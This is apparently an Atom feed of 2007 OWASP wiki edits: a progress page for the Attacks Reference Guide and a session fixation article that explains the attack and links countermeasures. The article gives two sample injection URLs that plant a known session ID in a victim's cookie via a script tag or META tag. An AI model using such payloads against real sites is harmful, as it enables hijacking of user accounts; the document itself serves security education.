| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled''' &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]&lt;br /&gt;
| Darren Edmonds&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23148</id>
		<title>SpoC 007 - Attacks Reference Guide - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23148"/>
				<updated>2007-11-06T13:06:00Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&amp;amp;D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:&lt;br /&gt;
&lt;br /&gt;
# Attack list revision and description (60% of the project)&lt;br /&gt;
# Attacks categorization (20% of the project)&lt;br /&gt;
# Research and describe new attacks (20% of the project)&lt;br /&gt;
&lt;br /&gt;
Total project status: '''100% Done!'''&lt;br /&gt;
&lt;br /&gt;
== CheckPoints and Decision ==&lt;br /&gt;
&lt;br /&gt;
===Phase 1 - 100% DONE ===&lt;br /&gt;
* Attack List Revision: '''Done!'''&lt;br /&gt;
Total number of items on the Attack Guide: '''91'''!&lt;br /&gt;
&lt;br /&gt;
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.&lt;br /&gt;
&lt;br /&gt;
Items considered to removal from the attack list: '''30 items''', as follows:&lt;br /&gt;
&lt;br /&gt;
**[[API_Abuse]]&lt;br /&gt;
**[[Cross_Site_Scripting]]&lt;br /&gt;
**[[Cross-Site_Scripting]]&lt;br /&gt;
**[[CSRF]]&lt;br /&gt;
**[[Internal_software_developer]]&lt;br /&gt;
**[[Interpreter_Injection]]&lt;br /&gt;
**[[Link_Following]]&lt;br /&gt;
**[[Log_forging]]&lt;br /&gt;
**[[Logic/time_bomb]]&lt;br /&gt;
**[[Macro_symbol]]&lt;br /&gt;
**[[Network_amplification]]&lt;br /&gt;
**[[One-Click_Attack]]&lt;br /&gt;
**[[OS_Injection]]&lt;br /&gt;
**[[OS_Command_Injection]]&lt;br /&gt;
**[[PRNG_permanent_compromise_attack]]&lt;br /&gt;
**[[Reviewing_Code_for_OS_Injection]]&lt;br /&gt;
**[[Script_in_IMG_tags]]&lt;br /&gt;
**[[Sniffing_application_traffic_attack]]&lt;br /&gt;
**[[Template:Attack]]&lt;br /&gt;
**[[Unquoted_Search_Path_or_Element]]&lt;br /&gt;
**[[Web_problems]]&lt;br /&gt;
**[[Wildcard_or_Matching_Element]]&lt;br /&gt;
**[[Windows_::DATA_alternate_data_stream]]&lt;br /&gt;
**[[Windows_hard_link]]&lt;br /&gt;
**[[Windows_MS-DOS_device_names]]&lt;br /&gt;
**[[Windows_Path_Link_problems]]&lt;br /&gt;
**[[Windows_Shortcut_Following_%28.LNK%29]]&lt;br /&gt;
**[[Windows_Virtual_File_problems]]&lt;br /&gt;
**[[XSS_Attacks]]&lt;br /&gt;
**[[XSRF]]&lt;br /&gt;
&lt;br /&gt;
* Attacks Description: '''61 of 61 items done'''!&lt;br /&gt;
&lt;br /&gt;
===Phase 2 - DONE! ===&lt;br /&gt;
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. &lt;br /&gt;
&lt;br /&gt;
The categories defined are:&lt;br /&gt;
* [[:Category:Abuse of Functionality]]&lt;br /&gt;
* [[:Category:Spoofing]]&lt;br /&gt;
* [[:Category:Probabilistic Techniques]]&lt;br /&gt;
* [[:Category:Exploitation of Authentication]]&lt;br /&gt;
* [[:Category:Resource Depletion]]&lt;br /&gt;
* Exploitation of Privilege/Trust&lt;br /&gt;
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)&lt;br /&gt;
* [[:Category:Data_Structure_Attacks]]&lt;br /&gt;
* Data Leakage Attacks&lt;br /&gt;
* [[:Category:Resource Manipulation]]&lt;br /&gt;
* [[:Category:Protocol Manipulation]]&lt;br /&gt;
* Time and State Attacks&lt;br /&gt;
&lt;br /&gt;
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.&lt;br /&gt;
&lt;br /&gt;
===Phase 3 - 100% DONE ===&lt;br /&gt;
Research and Description of new attacks:&lt;br /&gt;
&lt;br /&gt;
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]&lt;br /&gt;
** [[Buffer_Overflow_via_Environment_Variables]]&lt;br /&gt;
** [[Cross_Frame_Scripting]]&lt;br /&gt;
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Overflow_Binary_Resource_File]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
=== Work Done ===&lt;br /&gt;
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file&lt;br /&gt;
&lt;br /&gt;
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;diff=23056&amp;amp;oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;diff=23057&amp;amp;oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;diff=23058&amp;amp;oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;diff=23060&amp;amp;oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;diff=23065&amp;amp;oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;diff=23117&amp;amp;oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;diff=23118&amp;amp;oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;diff=23067&amp;amp;oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;diff=23075&amp;amp;oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&amp;amp;diff=23077&amp;amp;oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;amp;action=history history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&amp;amp;diff=23079&amp;amp;oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&amp;amp;diff=23082&amp;amp;oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Network_Eavesdropping]] - ([http://www.owasp.org/index.php?title=Network_Eavesdropping&amp;amp;diff=23146&amp;amp;oldid=7395 diff] , [http://www.owasp.org/index.php?title=Network_Eavesdropping&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;diff=23084&amp;amp;oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;action=history history])&lt;br /&gt;
	&lt;br /&gt;
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;diff=23059&amp;amp;oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;diff=23066&amp;amp;oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;diff=23071&amp;amp;oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;diff=23076&amp;amp;oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&amp;amp;diff=23078&amp;amp;oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;diff=23081&amp;amp;oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Session_fixation]] - ([http://www.owasp.org/index.php?title=Session_fixation&amp;amp;diff=23144&amp;amp;oldid=7391 diff] , [http://www.owasp.org/index.php?title=Session_fixation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;diff=23086&amp;amp;oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;diff=23088&amp;amp;oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;diff=23089&amp;amp;oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&amp;amp;diff=23090&amp;amp;oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[SQL_Injection]] - ([http://www.owasp.org/index.php?title=SQL_Injection&amp;amp;diff=23119&amp;amp;oldid=21964 diff] , [http://www.owasp.org/index.php?title=SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;diff=23109&amp;amp;oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;diff=23093&amp;amp;oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;diff=23094&amp;amp;oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;diff=23104&amp;amp;oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''New items'''&lt;br /&gt;
** [[Denial_of_Service]]&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;diff=22637&amp;amp;oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;diff=22638&amp;amp;oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;diff=22641&amp;amp;oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;diff=22642&amp;amp;oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;diff=22647&amp;amp;oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&amp;amp;diff=22651&amp;amp;oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&amp;amp;diff=22654&amp;amp;oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;diff=22643&amp;amp;oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;diff=22658&amp;amp;oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;diff=22660&amp;amp;oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&amp;amp;diff=22661&amp;amp;oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;diff=22662&amp;amp;oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;diff=22954&amp;amp;oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;action=history history])&lt;br /&gt;
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;diff=22956&amp;amp;oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;action=history history])&lt;br /&gt;
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;diff=22957&amp;amp;oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;diff=22959&amp;amp;oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;diff=22960&amp;amp;oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&amp;amp;diff=22961&amp;amp;oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&amp;amp;action=history history])&lt;br /&gt;
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;diff=22962&amp;amp;oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;action=history history])&lt;br /&gt;
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;diff=22963&amp;amp;oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;diff=22965&amp;amp;oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;diff=22936&amp;amp;oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;diff=22937&amp;amp;oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):&lt;br /&gt;
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&amp;amp;action=history history])&lt;br /&gt;
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&amp;amp;action=history history])&lt;br /&gt;
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&amp;amp;action=history history])&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Sniffing_Attacks&amp;diff=23147</id>
		<title>Category:Sniffing Attacks</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Sniffing_Attacks&amp;diff=23147"/>
				<updated>2007-11-06T13:02:54Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: New page: category:attack&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[category:attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Eavesdropping.jpg&amp;diff=23145</id>
		<title>File:Eavesdropping.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Eavesdropping.jpg&amp;diff=23145"/>
				<updated>2007-11-06T12:25:17Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Session_fixation&amp;diff=23144</id>
		<title>Session fixation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Session_fixation&amp;diff=23144"/>
				<updated>2007-11-06T12:08:23Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
The session fixation is an attack that permits hijack a valid user session. The attack explore a limitation in the way the web application manage the session ID, more specifically the vulnerable web application, when authenticate an user, doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists in inducing a user to authenticate himself with a known session ID, and then hijack the user validated session by the knowledge of the used session ID. So the attacker has to provide a legitimate Web application session ID and try to make the victim browser to use it.&lt;br /&gt;
&lt;br /&gt;
The session fixation attack is considered a class of session hijacking, but, instead to steal the established session between the client and the Web Server after the user log in. Instead the session fixation attack, fixes an established session on the victim browser so the attack starts before the user log in. &lt;br /&gt;
&lt;br /&gt;
There are some techniques to execute the attack, it depends on how the Web application deals with session token, below are some of the most common techniques:&lt;br /&gt;
&lt;br /&gt;
'''• Session token in the URL argument:'''&lt;br /&gt;
Session ID is sent to the victim in a hyperlink and the victim have to access the site through the malicious URL.&lt;br /&gt;
'''&lt;br /&gt;
• Session token in a hidden form field:'''&lt;br /&gt;
In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in evil web server or directly in html formatted e-mail.&lt;br /&gt;
&lt;br /&gt;
'''• Session ID in a cookie:'''&lt;br /&gt;
&lt;br /&gt;
o Client-side script&lt;br /&gt;
&lt;br /&gt;
Most of browsers support the execution of client-side scripting, in this case, the aggressor could use attacks of code injection as the XSS attack (Cross-site scripting attack) to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser execute the command become capable to fix values inside of the cookie that it will be used to keep a session between the client and the Web Application.&lt;br /&gt;
 &lt;br /&gt;
o &amp;lt;META&amp;gt; tag&lt;br /&gt;
&lt;br /&gt;
&amp;lt;META&amp;gt; tag also is considered a code injection attack, however, different of the XSS attack where scripts undesirable can be disabled or deny the execution, the attack using this method becomes much more efficient for the impossibility to disable the processing of these tags in the browsers.&lt;br /&gt;
&lt;br /&gt;
o HTTP header response&lt;br /&gt;
&lt;br /&gt;
This method explores the server response to fix the Session ID in the victim browser. Including the parameter Set-Cookie in the HTTP header response, the attacker is capable to insert the value of Session ID in the cookie and sends it to the victim browser.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
===Example 1===&lt;br /&gt;
The example below has the intention to explain a simple form the process of the attack and the expected results.&lt;br /&gt;
&lt;br /&gt;
(1)The attacker has to establish a legitimate connection with the web server which (2) issues a session ID or, the attacker can create a new session with proposed session ID, then, (3) the attacker has to send a link with the established session ID to the victim, she has to click on the link sent from the attacker accessing the site, (4) the Web Server saw that session was already established and a new one need not to be created, (5) the victim provides his credentials to the Web Server, (6) knowing the session ID the attacker can access the user´s account.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/images/9/9c/Fixation.jpg&lt;br /&gt;
&lt;br /&gt;
Figure 1. Simple example of Session Fixation attack.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
Client-side scripting&lt;br /&gt;
&lt;br /&gt;
The processes for the attack using the execution of scripts in the victim browser are very similar with the example 1, however, in this case, the Session ID does not appear as an argument of the URL, but inside of the cookie, to fix the value of the Session ID in the victim cookie, the attacker could insert a Javascript code in the URL that will be executed in the victim browser.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://website.kom/&amp;lt;script&amp;gt;document.cookie=”sessionid=abcd”;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 3===&lt;br /&gt;
&amp;lt;META&amp;gt; tag&lt;br /&gt;
&lt;br /&gt;
As well as client-side scripting, the codes injection must be made in the URL that will be sent to the victim.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://website.kon/&amp;lt;meta http-equiv=Set-Cookie content=”sessionid=abcd”&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 4===&lt;br /&gt;
HTTP header response&lt;br /&gt;
&lt;br /&gt;
The insertion of the value of the SessionID in the cookie manipulating the server response can be made intercepting the packages exchanged between the client and the Web Application inserting the Set-Cookie parameter.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/images/e/ed/Fixation2.jpg&lt;br /&gt;
&lt;br /&gt;
Figure 2. Set-Cookie in the HTTP header response&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
&lt;br /&gt;
*http://www.acros.si/papers/session_fixation.pdf&lt;br /&gt;
*http://en.wikipedia.org/wiki/Session_fixation&lt;br /&gt;
*http://www.derkeiler.com/pdf/Mailing-Lists/Securiteam/2002-12/0099.pdf&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Authorization]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
* [[XSS Attacks]]&lt;br /&gt;
* [[Session hijacking attack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Session Management Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
*[[Session Fixation Protection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Fixation2.jpg&amp;diff=23143</id>
		<title>File:Fixation2.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Fixation2.jpg&amp;diff=23143"/>
				<updated>2007-11-06T11:56:06Z</updated>
		
